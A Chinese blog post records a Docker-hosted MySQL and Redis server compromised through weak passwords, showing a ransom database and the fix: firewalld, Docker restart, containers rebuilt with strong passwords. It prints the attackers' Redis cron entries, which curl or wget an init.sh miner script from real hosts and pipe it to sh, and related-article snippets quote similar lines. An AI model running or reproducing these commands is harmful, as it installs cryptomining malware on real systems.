记录Redis和MySQL被扫描注入攻击

最新推荐文章于 2024-04-24 21:30:40 发布
最新推荐文章于 2024-04-24 21:30:40 发布
阅读量1.2k 收藏
点赞数
分类专栏: 数据库 文章标签: redis mysql docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44610529/article/details/126173428
版权

私人服务器使用docker搭建MySQL和Redis的开发环境后没有很在意安全防护,直接使用123456这种弱密码的方式搭建的,最后被扫描攻击了。
MySQL连接后发现库里的数据都没了,出现了以下库,勒索要钱的:
请添加图片描述
Redis连接后key也都没了,出现了这几个东西,挖矿的:

> keys *
backup4
backup2
backup3
backup1
> get backup1
*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh
> get backup2
*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh
> get backup3
*/4 * * * * root curl -fsSL http://45.128.150.171/cleanfda/init.sh | sh
> get backup4
*/5 * * * * root wd1 -q -O- http://45.128.150.171/cleanfda/init.sh | sh

1、开启防火墙

使用docker stop 停掉相关容器

systemctl enable firewalld.service #开机自启防火墙
systemctl start firewalld #启动防火墙
systemctl status firewalld #查看防火墙状态

但是在检查状态的时候报了个这错误

firewalld.service - firewalld - dynamic firewall daemon
   Loaded: loaded (/usr/lib/systemd/system/firewalld.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2022-08-05 10:44:05 CST; 2s ago
     Docs: man:firewalld(1)
 Main PID: 5929 (firewalld)
    Tasks: 2
   Memory: 33.4M
   CGroup: /system.slice/firewalld.service
           └─5929 /usr/bin/python2 -Es /usr/sbin/firewalld --nofork --nopid

Aug 05 10:44:04 ls-u7x6wtwe systemd[1]: Starting firewalld - dynamic firewall daemon...
Aug 05 10:44:05 ls-u7x6wtwe systemd[1]: Started firewalld - dynamic firewall daemon.
Aug 05 10:44:05 ls-u7x6wtwe firewalld[5929]: WARNING: AllowZoneDrifting is enabled. This is consi...ow.
Hint: Some lines were ellipsized, use -l to show in full.

修改配置,重启防火墙

#修改配置
vim /etc/firewalld/firewalld.conf
# 修改内容
AllowZoneDrifting=yes 改成 no
# 重启防火墙
systemctl restart firewalld

2、重新启动docker

重启防火墙之后需要重启docker,不然启动容器会报端口错误。

systemctl restart docker

3、删除旧镜像,创建新镜像并设置强密码

可以改一下密码重新用的,但是担心镜像里面已经被注入了一些脚本呀啥的,且没啥重要数据需要恢复。

docker stop 镜像id
docker rm 镜像id
# 创建MySQL镜像
docker run --name mysql \
-v /wecoding/tools/mysql/conf:/etc/mysql \
-v /wecoding/tools/mysql/data:/var/lib/mysql \
-p 3306:3306 \
-e MYSQL_ROOT_PASSWORD="新密码" \
--net=my-net --network-alias mysql \
-d mysql:5.7 --lower-case-table-names=1
#创建redis镜像
docker run \
-p 6379:6379 --name redis \
-v /wecoding/tools/redis:/etc/redis \
-v /wecoding/tools/redis/data:/data \
--net=my-net --network-alias redis \
-d redis:5.0 redis-server /etc/redis/redis.conf --appendonly yes
# 设置redis密码
docker exec -it redis redis-cli
config set requirepass 新密码
不锈钢机器猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql导出表的字段和相关属性的步骤方法
12-16
- **SQL注入问题**:在使用Python的pymysql库时,应使用参数化查询或预编译语句来防止SQL注入攻击,确保数据安全。 通过以上步骤和知识点,你可以高效地导出并管理MySQL数据库中的表结构信息。理解并熟练运用这些...
mysql面经文档、技术要点.docx
01-08
- **SQL注入**:通过构造恶意SQL语句攻击数据库,应使用预处理语句和参数化查询来防止。 - **权限管理**:通过GRANT和REVOKE命令控制用户对数据库的访问权限。 6. **MySQL性能优化**: - **慢查询**:使用`slow_...
Redis —— 一次错误记录
weixin_51123079的博客
11-27 1829
今天在使用 Redis 存储数据时,发现数据每隔一段时间就会消失,刚开始以为是数据过期时间的问题,使用 QuickRedis 连上 Redis 后,发现数据的过期时间也没有问题,但却发现 数据库0 莫名其妙多出几个 key(backup1、backup2、backup3、backup4),接着我去查看了 Redis 的运行日志,发现 Redis 一直报这个错。,在网上搜索了一番之后,最终确定 Redis 可能遭受了 RDB 方式的入侵攻击
Redis如何设置密码
HoJe的博客
03-12 7729
为什么redis要设置密码?内网环境可以不设置密码,但是个人服务器,以及线上公网服务器就有必要设置密码了。昨天我查看了一下minio的redis事件通知,查看redis的key时发现多了几个奇怪的key。然后我猜想应该是挖矿病毒。如下面所示:这样就将定时任务和脚本注入到了我们机器当中,就会开始执行 init.sh 脚本公网的redis一定要设置密码阿,不要不设置密码,设置密码就一个指令,非常容易,可不要偷懒噢。
记录一次挖矿事件
weixin_40368523的博客
05-20 1809
事件参考网上文章解决:https://blog.csdn.net/mdzz14/article/details/111656726 某一天在测试环境使用dcoker的时候发现不能使用,起初怀疑是否由同事卸载,后续在使用curl命令的时候发现不能使用,怀疑服务器出现了别的异常并在crontab下发现了异常脚本newinit.sh的脚本,证实服务器中了挖矿病毒。 原因:开发在测试环境搭建的redis,服务监听了公网端口未设置访问密码并且其进程启动时使用了root用户,攻击者可远程登录到Redis中,通过R.
记一次 newinit.sh 相关病毒处理
muyu_feng的博客
09-26 4486
(ps:在这之前经历过五六次木马病毒攻击,都是搞个定时任务下载脚本,然后就拿你服务器搞事情。去年活动 我自己买了一台腾讯云服务器 100多 三年的(巨便宜,现在再也买不到 QAQ)自己玩的。然后服务器被挖矿被封了,钱倒是退了,可再也买不到这么便宜的服务起了。因为是刚弄的一台16G服务器,才部署2个项目运行几天一切正常。再次部署多实例时发现,已部署好的服务老是掉,项目日志一切正常,感觉不太正常。去查看 隐藏权限中会多了ai权限 ,它修改了很多文件权限。最后还是CPU100%的问题只能重启服务器,再看就好了。
Redis 也能被攻击?一次Redis被入侵的记录
探索云原生
12-05 5559
通过 RDB 方式入侵,Redis攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
java+mysql学生及教师信息管理系统
06-22
- **数据验证**:在数据输入时进行验证,防止SQL注入攻击,确保用户输入的数据符合系统要求。 - **权限控制**:设定不同角色(如管理员、学生、教师)的权限,避免非法操作,保护数据安全。 6. **性能优化**: -...
企业生产MySQL优化介绍
09-09
数据库安全方面,禁止从外网访问数据库,限制文件权限,每个数据库对应特定用户,严格控制开发人员对生产库的操作权限,防止SQL注入攻击。 总的来说,企业生产环境下的MySQL优化是一个综合性的过程,涉及到硬件、...
数据库管理系统MySql(JSP版).rar_jsp mysql 系统_jsp管理系统_mysql jsp
09-19
在"数据库管理系统MySQL(JSP版)"中,JSP被用来作为前端展示和用户交互的工具,而MySQL则作为后台的数据存储和管理。这样的系统设计能够提供一个功能强大的Web应用程序,让用户可以通过浏览器进行数据的增删改查等...
php+mysql文章发布系统
07-04
1. **数据安全**:使用预处理语句防止SQL注入,对用户输入进行过滤和校验,避免XSS攻击。 2. **性能优化**:合理设计数据库索引,减少不必要的全表扫描;使用缓存技术(如Redis)减轻数据库压力;对静态资源进行压缩...
分享和记录常见的php面试题和面试技巧.zip
03-16
- MySQLi:与MySQL的交互,了解面向对象和面向过程两种模式。 - SQL查询优化:索引使用、避免全表扫描、JOIN操作优化。 4. **PHP框架**: - Laravel:路由、控制器、模型、视图、Blade模板引擎、Eloquent ORM、...
php+mysql chm文档
12-10
2. PDO:提供了更安全的预处理语句,可以有效防止SQL注入攻击。使用`PDO::__construct()`建立连接,`PDO::prepare()`准备SQL语句,`PDOStatement::execute()`执行预处理语句。 【PHP中的MySQL操作示例】 以下是一...
基于MYsql数据库开发的电子商务网站
01-14
使用预编译的SQL语句(如PreparedStatement)防止SQL注入攻击。对敏感信息如密码进行加密存储。 - **扩展性**:随着业务增长,可能需要水平或垂直扩展数据库。水平扩展(如主从复制、分布式数据库)可以提高读取...
php+mysql网络开发技术
06-30
要防止SQL注入攻击,可以使用预处理语句或参数化查询。同时,要对用户输入进行验证和清理,防止XSS跨站脚本攻击。此外,还需关注密码存储的安全方式,如使用哈希加盐策略。 7. MVC模式:Model-View-Controller(MVC...
解决redis的key都变成了backupredis所有缓存被清空
xianchao0127的博客
05-28 1499
找到redis的配置文件redis.conf重启redis容器,问题解析来源:Redis 未授权访问漏洞分析 cleanfda 脚本复现漏洞挖矿 https://www.renfei.net/posts/1003501。
记录第一次云服务器redis被黑
最新发布
m0_73520938的博客
04-24 236
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
lilyliu2535的博客
12-23 2940
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击 #背景 阿里云ECS-Centos7.9集群:hadoop202,hadoop203,hadoop204 hadoop202启动redis-server服务 redis.conf配置 #bind 127.0.0.1 protected-mode no #requirepass hadoop202,hadoop203,hadoop204配置了免密 #遭木马入侵,3台机器 CPU占用高 ~/.ssh/authorized_keys遭篡改 cron
服务器遭遇挖矿脚本入侵,歪果仁玩的真花
王声声的博客
03-21 1831
【代码】服务器遭遇挖矿脚本入侵,歪果仁玩的真花。
redismysql
07-28
RedisMySQL在业务中有不同的功能和使用场景。Redis主要用于缓存数据,数据基本上是在内存中操作,以提高读取速度和性能。而MySQL则是一种关系型数据库,数据存储在磁盘中。在web应用中,一般采用MySQL+Redis的方式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值